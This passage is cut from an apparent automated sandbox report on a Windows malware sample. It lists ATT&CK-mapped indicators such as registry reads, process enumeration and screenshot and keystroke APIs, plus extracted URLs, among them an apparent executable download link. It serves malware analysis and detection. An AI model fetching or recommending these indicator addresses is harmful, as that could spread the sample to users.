"registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"rundll32.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00006120)\n \"rundll32.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005596)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"GetForegroundWindow\" (UID: 00000000-00006120)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"rundll32.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00005596)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"rundll32.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-130", "type": 3, "relevance": 1, "name": "Queries TCP/IP interface details", "description": "\"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DOMAIN\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{07B41F79-1AEC-4782-A6E8-8C28FFBA35ED}\"; Key: \"DHCPDOMAIN\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"ENABLEDHCP\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTRATIONENABLED\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"REGISTERADAPTERNAME\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DOMAIN\"; Value: \"\")\n \"rundll32.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\\INTERFACES\\{E29AC6C2-7037-11DE-816D-806E6F6E6963}\"; Key: \"DHCPDOMAIN\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-31", "type": 1, "relevance": 1, "name": "Contains ability to retrieve/open a process", "description": "OpenProcess@KERNEL32.dll at 39956-105-00405070\n OpenProcess@KERNEL32.dll at 39956-97-00404B90\n OpenProcess@KERNEL32.dll at 39956-99-004047D0\n OpenProcess@KERNEL32.DLL at 00000000-00006120-43002-26-00404B90\n OpenProcess@KERNEL32.DLL at 00000000-00006120-43002-34-00405070\n OpenProcess@KERNEL32.DLL at 00000000-00006120-43002-28-004047D0", "origin": "Hybrid Analysis Technology", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-207", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file and directory information (API string)", "description": "Found reference to API \"GetFileAttributesA\" (Indicator: \"GetFileAttributes\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"GetTempPathA\" (Indicator: \"GetTempPath\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"GetTempFileNameA\" (Indicator: \"GetTempFileName\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"GetSystemDirectoryA\" (Indicator: \"GetSystemDirectory\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"GetTempFileNameA\" (Indicator: \"GetTempFileName\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API \"GetFileAttributesA\" (Indicator: \"GetFileAttributes\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API \"GetSystemDirectoryA\" (Indicator: \"GetSystemDirectory\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API \"GetTempPathA\" (Indicator: \"GetTempPath\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API \"GetTempFileNameA\" (Indicator: \"GetTempFileName\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")\n Found reference to API \"GetFileAttributesA\" (Indicator: \"GetFileAttributes\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-78", "type": 2, "relevance": 1, "name": "Contains ability to capture screen (API string)", "description": "Found reference to API \"GetDesktopWindow\" (Indicator: \"GetDesktopWindow\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"GetDesktopWindow\" (Indicator: \"GetDesktopWindow\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-229", "type": 2, "relevance": 1, "name": "Contains ability to query registry keys (API string)", "description": "Found reference to API \"RegQueryValueExA\" (Indicator: \"RegQueryValue\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"RegOpenKeyExA\" (Indicator: \"RegOpenKey\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"RegOpenKeyExA\" (Indicator: \"RegOpenKey\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API \"RegQueryValueExA\" (Indicator: \"RegQueryValue\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-57", "type": 2, "relevance": 3, "name": "Contains CRYPTO related strings", "description": "Found string \"base64\" (Indicator: \"base64\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n file/memory contains long string with (Indicator: \"base64\"; File: \"notepad_.exe\")\n Found string \"moc.5432.hcraesgg\" (Indicator: \"aes\"; Source: \"00000000-00005596.00000001.67056.00190000.00000004.mdmp\")\n Found string \"moc.hcraeserdracerocs\" (Indicator: \"aes\"; Source: \"00000000-00005596.00000001.67056.00190000.00000004.mdmp\")\n Found string \"ten.mrofdaes.revres\" (Indicator: \"aes\"; Source: \"00000000-00005596.00000001.67056.00190000.00000004.mdmp\")\n Found string \"ten.mrofdaes\" (Indicator: \"aes\"; Source: \"00000000-00005596.00000001.67056.00190000.00000004.mdmp\")\n Found string \"base64\" (Indicator: \"base64\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-164", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the fully qualified path of module (API string)", "description": "Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"GetModuleFileNameExA\" (Indicator: \"GetModuleFileName\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API \"GetModuleFileNameExA\" (Indicator: \"GetModuleFileName\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-205", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the time elapsed since the system was started (API string)", "description": "Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-317", "type": 2, "relevance": 1, "name": "Contains ability to retrieve address of exported function from a DLL (API string)", "description": "Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-85", "type": 2, "relevance": 1, "name": "Contains ability to enumerate process and/or its information (API string)", "description": "Found reference to API \"GetCurrentProcessId\" (Indicator: \"GetCurrentProcess\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"EnumProcessModules\" (Indicator: \"EnumProcessModules\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"EnumProcesses\" (Indicator: \"EnumProcesses\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"Process32Next\" (Indicator: \"Process32Next\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"Process32First\" (Indicator: \"Process32First\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"CreateToolhelp32Snapshot\" (Indicator: \"CreateToolhelp32Snapshot\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"GetCurrentProcessId\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00005596.00000000.66925.0040B000.00000040.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API \"EnumProcessModules\" (Indicator: \"EnumProcessModules\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API \"EnumProcesses\" (Indicator: \"EnumProcesses\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API \"Process32Next\" (Indicator: \"Process32Next\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API \"Process32First\" (Indicator: \"Process32First\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API \"CreateToolhelp32Snapshot\" (Indicator: \"CreateToolhelp32Snapshot\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")\n Found reference to API \"GetCurrentProcessId\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00006120.00000000.66663.0040B000.00000040.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-427", "type": 2, "relevance": 1, "name": "Contains ability to retrieve a module handle (API string)", "description": "Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system\\*.* (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"FindNextFileW\" with parameter .. (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"FindNextFileW\" with parameter avicap.dll (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"FindNextFileW\" with parameter avifile.dll (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"FindNextFileW\" with parameter COMMDLG.DLL (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"FindNextFileW\" with parameter keyboard.drv (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"FindNextFileW\" with parameter lzexpand.dll (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"FindNextFileW\" with parameter mciavi.drv (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"FindNextFileW\" with parameter mciseq.drv (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"FindNextFileW\" with parameter mciwave.drv (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"FindNextFileW\" with parameter MMSYSTEM.DLL (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"FindNextFileW\" with parameter mmtask.tsk (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"FindNextFileW\" with parameter mouse.drv (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"FindNextFileW\" with parameter msvideo.dll (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"FindNextFileW\" with parameter olecli.dll (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"FindNextFileW\" with parameter OLESVR.DLL (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"FindNextFileW\" with parameter rundll32.exe (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"FindNextFileW\" with parameter SHELL.DLL (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"FindNextFileW\" with parameter sound.drv (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"FindNextFileW\" with parameter stdole.tlb (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"FindNextFileW\" with parameter system.drv (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"FindNextFileW\" with parameter TIMER.DRV (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"FindNextFileW\" with parameter ver.dll (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"FindNextFileW\" with parameter vga.drv (UID: 00000000-00006120)\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"FindNextFileW\" with parameter WFWNET.DRV (UID: 00000000-00006120)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-105", "type": 6, "relevance": 3, "name": "Calls an API possibly used to take screenshots", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1073809989\"\n \"cx\": \"325\"\n \"cy\": \"25\"}\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"1241581400\"\n \"cx\": \"16\"\n \"cy\": \"16\"}\n \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"CreateCompatibleBitmap\" with parameters {\"hdc\": \"503384427\"\n \"cx\": \"325\"\n \"cy\": \"25\"}", "origin": "API Call", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-88", "type": 2, "relevance": 1, "name": "Contains ability to retrieve information about pressed keystrokes (API string)", "description": "Found reference to API \"GetKeyState\" (Indicator: \"GetKeyState\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"GetKeyState\" (Indicator: \"GetKeyState\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-86", "type": 2, "relevance": 1, "name": "Contains ability to retrieve information about operating system (API string)", "description": "Found reference to API \"9049116994,5916,3024,,RtlGetVersion,NTDLL.dll,\"252:02:53.829\",RX=0,PX=0\" (Indicator: \"RtlGetVersion\"; Source: \"00000000-00006120.00000000.66663.00180000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"2\"\n \"th32ProcessID\": \"0\"}\n \"rundll32.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "static-88", "relevance": 1, "name": "Imports GetCommandLine API", "description": "Observed import api \"GetCommandLineA\" which can \"Retrieves the command-line string for the current process\" [Source: fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f]\n Observed import api \"GetCommandLineA\" which can \"Retrieves the command-line string for the current process\" [Source: notepad_.exe]\n Observed import api \"GetCommandLineA\" which can \"Retrieves the command-line string for the current process\" [Source: rundll32.exe]\n Observed import api \"GetCommandLineA\" which can \"Retrieves the command-line string for the current process\" [Source: _.exe]", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-537", "type": 2, "relevance": 1, "name": "Contains ability to create a new HTTP request (API string)", "description": "Found reference to API \"HttpOpenRequestA\" (Indicator: \"HttpOpenRequest\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")\n Found reference to API \"HttpOpenRequestA\" (Indicator: \"HttpOpenRequest\"; Source: \"00000000-00005596.00000001.67056.0040C000.00000080.mdmp\")", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-228", "type": 2, "relevance": 1, "name": "Contains ability to communicate with C2 using Sockets (API string)", "description": "Found reference to API \"WSAStartup\" (Indicator: \"WSAStartup\"; File: \"fe3954fdf5af164d8acd2db166aca208fc6ebd22d730ef173174a7b8ff70842f\")", "origin": "File/Memory", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-3", "type": 2, "relevance": 3, "name": "Found potential URL in binary/memory", "description": "Pattern match: \"http://www.3721.com/adjusttime.htm\"\n Pattern match: \"http://%s/\"\n Heuristic match: \"pop3.163.com\"\n Heuristic match: \"mail.online.ie\"\n Heuristic match: \"aha01%s@online.ie\"\n Pattern match: \"http://www.mxm9191.com/myrunner_up.exe\"\n Pattern match: \"http://www.zigui.org/article.php?id=103822\"\n Pattern match: \"www.3721.com/adjusttime.htmmozilla/4.0\"\n Pattern match: \"www.zigui.org\"\n Pattern match: \"www.zigui.orgconnection\"\n Pattern match: \"www.zigui.org/article.php?id=103822\"\n Heuristic match: \"ww.zigui.org\"\n Heuristic match: \"igui.org\"\n Pattern match: \"www.babycenter.com/\"\n Pattern match: \"www.microsoft.com/\"\n Pattern match: \"www.gamesgames.com/\"\n Heuristic match: \"zigui.org\"\n Pattern match: \"secure-assets.rubiconproject.com/utils/xapi/\"\n Heuristic match: \"ptimizely.co\"\n Pattern match: \"www.rakuten.co.jp/\"\n Pattern match: \"www.kohls.com/\"\n Pattern match: \"www.submarino.com.br/\"\n Pattern match: \"www.eol.cn/\"\n Pattern match: \"www.sapo.pt/\"\n Pattern match: \"www.laredoute.fr\"\n Heuristic match: \"autoscout24.de\"\n Heuristic match: \"unrulymedia.com\"\n Heuristic match: \"partycasino.com\"\n Heuristic match: \"lfstmedia.com\"\n Heuristic match: \"directadvert.ru\"\n Heuristic match: \"spotxchange.com\"\n Heuristic match: \"tiara.daum.net\"\n Pattern match: \"www.blogcu.com\"\n Heuristic match: \"tribalfusion.com\"\n Heuristic match: \"x01.aidata.io\"\n Heuristic match: \"u3s.mathtag.com\"\n Heuristic match: \"listenvid.com\"\n Heuristic match: \"buenastareas.com\"\n Heuristic match: \"virginmedia.com\"\n Pattern match: \"www.amazon.de\"\n Pattern match: \"www.netshoes.com.br\"\n Heuristic match: \"count.pcauto.com.cn\"\n Heuristic match: \"savings-united.com\"\n Heuristic match: \"ih.adscale.de\"\n Pattern match: \"www.priceline.com\"\n Pattern match: \"www.gamesgames.com\"\n Pattern match: \"www.microsoft.com\"\n Heuristic match: \"urbandictionary.com\"\n Heuristic match: \"config.parsely.com\"\n Heuristic match: \"y.one.impact-ad.jp\"\n Pattern match: \"www.lowermybills.com\"\n Pattern match: \"www.eastmoney.com\"\n Heuristic match: \"yjtag.yahoo.co.jp\"\n Heuristic match: \"secure.calcch.com\"\n Heuristic match: \"logging.admicro.vn\"\n Pattern match: \"www.bloomberg.com\"\n Heuristic match: \"rincondelvago.com\"\n Pattern match: \"www.moviefone.com\"\n Heuristic match: \"accounts.google.com\"\n Heuristic match: \"ibeu2.mookie1.com\"\n Heuristic match: \"it.altervista.org\"\n Heuristic match: \"ggsearch.2345.com\"\n Heuristic match: \"skimresources.com\"\n Pattern match: \"www.babycenter.com\"\n Heuristic match: \"minijuegosgratis.com\"\n Heuristic match: \"vatrack.hinet.net\"\n Heuristic match: \"adfarm1.adition.com\"\n Heuristic match: \"moc.ataderusaert.ni\"\n Heuristic match: \"in.treasuredata.com\"\n Heuristic match: \"px.powerlinks.com\"\n Heuristic match: \"duba.com\"\n Heuristic match: \"wsj.com\"\n Heuristic match: \"gap.com\"\n Heuristic match: \"bidr.io\"\n Heuristic match: \"rum-dytrc.corriere.it\"\n Pattern match: \"www.howstuffworks.com\"\n Heuristic match: \"livechatinc.com\"\n Heuristic match: \"droit-finances.commentcamarche.net\"\n Heuristic match: \"targeting.unrulymedia.com\"\n Heuristic match: \"secure-assets.rubiconproject.com\"\n Heuristic match: \"tap-secure.rubiconproject.com\"\n Heuristic match: \"convertro.com\"\n Heuristic match: \"api.unthem.com\"\n Pattern match: \"www.hao123.com\"\n Heuristic match: \"wordpress.org\"\n Heuristic match: \"pconline.com.cn\"\n Pattern match: \"www.blizzard.com\"\n Heuristic match: \"tealiumiq.com\"\n Heuristic match: \"admaster.com.cn\"\n Heuristic match: \"basebanner.com\"\n Heuristic match: \"eyeviewads.com\"\n Pattern match: \"www.114la.com\"\n Pattern match: \"www.toshiba.com\"\n Heuristic match: \"sharethis.com\"\n Pattern match: \"www.sogou.com\"\n Heuristic match: \"newgrounds.com\"\n Heuristic match: \"impress.co.jp\"\n Heuristic match: \"bigmining.com\"\n Pattern match: \"www.topix.com\"\n Heuristic match: \"infospace.com\"\n Pattern match: \"www.metacafe.com\"\n Pattern match: \"www.tamgrt.com\"\n Heuristic match: \"a1.adform.net\"\n Heuristic match: \"match.rundsp.com\"\n Heuristic match: \"go.sonobi.com\"\n Heuristic match: \"wunderground.com\"\n Heuristic match: 